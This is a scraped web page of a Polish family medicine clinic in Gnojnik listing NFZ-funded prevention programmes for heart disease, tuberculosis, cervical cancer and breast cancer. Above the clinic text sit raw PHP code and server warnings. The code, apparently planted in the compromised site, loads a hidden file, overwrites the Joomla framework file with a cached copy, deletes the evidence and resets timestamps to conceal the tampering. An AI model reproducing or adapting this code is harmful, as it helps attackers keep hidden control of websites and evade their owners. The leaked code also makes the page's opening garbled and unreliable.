$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); }
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /www/nzozgnojnik/includes/framework.php:92) in /www/nzozgnojnik/libraries/joomla/session/session.php on line 423

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /www/nzozgnojnik/includes/framework.php:92) in /www/nzozgnojnik/libraries/joomla/session/session.php on line 423

Warning: Cannot modify header information - headers already sent by (output started at /www/nzozgnojnik/includes/framework.php:92) in /www/nzozgnojnik/libraries/joomla/session/session.php on line 426
 Programy z NFZ

Centrum Medycyny Rodzinnej

Niepubliczny Zakład Opieki Zdrowotnej
Gnojnik 537, 32-864 Gnojnik
14 68 69 965, 14 68 69 965

Przychodnia czynna
pn-pt 7:30-18:00

Rehabilitacja czynna
pn-pt 8:00 - 18:00
14 68 69 800

Ośrodek Rehabilitacyjno - Wypoczynkowy "EWA" w Gnojniku

Ośrodek Rehabilitacyjno - Wypoczynkowy "EWA" w Gnojniku

Programy Profilaktyczne

W naszym Zakładzie przeprowadzane są ogólnopolskie programy profilaktyczne finansowane przez NFZ.

Program Profilaktyki Chorób Układu Krążenia

Choroby układu krążenia są główną przyczyną zgonów w Polsce i na świecie. Program przeznaczony jest dla osób obciążonych czynnikami ryzyka rozwoju chorób układu krążenia. Należą do nich:

  • nadciśnienie tętnicze,
  • zaburzenia gospodarki lipidowej,
  • palenie tytoniu,
  • niska aktywność fizyczna,
  • nadwaga i otyłość,
  • upośledzona tolerancja glukozy,
  • nadmierny stres,
  • nieracjonalne odżywianie,
  • wiek,
  • płeć męska.

Adresatami programu są w szczególności osoby obciążone czynnikami ryzyka, zadeklarowane do lekarza podstawowej opieki zdrowotnej i w tym roku będące w 35, 40, 45, 50 oraz 55 roku życia, u których nie została dotychczas rozpoznana choroba układu krążenia i które w okresie ostatnich 5 lat nie korzystały ze świadczeń udzielanych w ramach programu (także u innych świadczeniodawców).

Uczestnicząc w tych badaniach można oznaczyć poziom lipidów, cukru, dokonać pomiaru ciśnienia krwi, wagi ciała, oznaczenia BMI oraz ocenić ryzyko wystąpienia chorób układu krążenia. Prowadzący badania indywidualnie każdemu pacjentowi oceniają ryzyko wystąpienia incydentu sercowo-naczyniowego. W zależności od uzyskanych wyników pacjent jest kierowany na edukację, a w razie potrzeby  otrzymuje skierowanie do Kardiologa celem dalszej diagnostyki i leczenia.

Więcej informacji na ten temat pod adresem: http://www.nfz.gov.pl/profilaktyka/programy.php?pr=3

 

Program profilaktyki gruźlicy

Gruźlica jest chorobą zakaźną wywoływaną przez bakterię - prątek gruźlicy. Źródłem zakażenia jest najczęściej chory na gruźlicę. Choroba przenosi się podczas kaszlu, kichania, odkrztuszania (odpluwania) głośnego śmiechu, mówienia (prątki wydalane są wraz z kropelkami śluzu). Zakażenie drogą powietrzną jest najczęstszym sposobem zakażenia. Jeden nie leczony chory prątkujący może zakazić w ciągu roku średnio od 10 do 15 osób. 
Gruźlica jest chorobą społeczną związaną z warunkami bytowania: życia (mieszkanie, odżywianie), pracy i wypoczynku. Przyczyną rozwoju choroby u zakażonego, jest osłabienie sił obronnych organizmu.

Zagrożenie chorobą sprawdzane jest podczas wywiadu z zatrudnionymi w NZOZ pielęgniarkami środowiskowo – rodzinnymi. Pielęgniarki zwracają się do pacjentów z propozycją wypełnienia odpowiedniej ankiety, która jest poufna.  Osoby, które miały kontakt z chorym na gruźlicę, bądź wobec których istnieją inne przesłanki, mogą się zgłosić do pielęgniarki swojego lekarza poz bez skierowania. W uzasadnionych przypadkach, pacjenci kierowani są do lekarza, który zleca szczegółowe badania.

Na jej podstawie dokonuje się  wstępnej oceny zagrożenia grużlicą płuc. Umożliwia  to skierowanie do dalszej diagnostyki i leczenia w poradni specjalistycznej.

Więcej informacji na ten temat pod adresem: http://www.nfz.gov.pl/profilaktyka/programy.php?pr=9

 

Program profilaktyki raka szyjki macicy

Rak szyjki macicy jest drugim, co do częstości, nowotworem u kobiet w Polsce. Szacuje się, że rocznie choroba dotyka ok. 4 tysięcy kobiet i ok. 2 tysiace umiera z tego powodu.

Program przeznaczony jest dla kobiet w wieku od 25 do 59 lat, ubezpieczonych, które w ciągu ostatnich 3 lat nie wykonywały badania cytologicznego. Badanie można wykonać w gabinecie ginekologicznym.

Więcej informacji na ten temat pod adresem: http://www.nfz.gov.pl/profilaktyka/programy.php?pr=2

 

Program wczesnego wykrywania raka piersi

Informujemy Pacjentki również o programie wczesnego wykrywania raka piersi. Wiosną organizujemy coroczne akcje mające na celu promocję zdrowia, na których wykonywane są badania mammograficzne - informacje o najbliższych terminach w Aktualnościach.

Więcej informacji pod adresem: http://www.nfz.gov.pl/profilaktyka/programy.php?pr=1, http://www.profilaktykaraka.coi.waw.pl/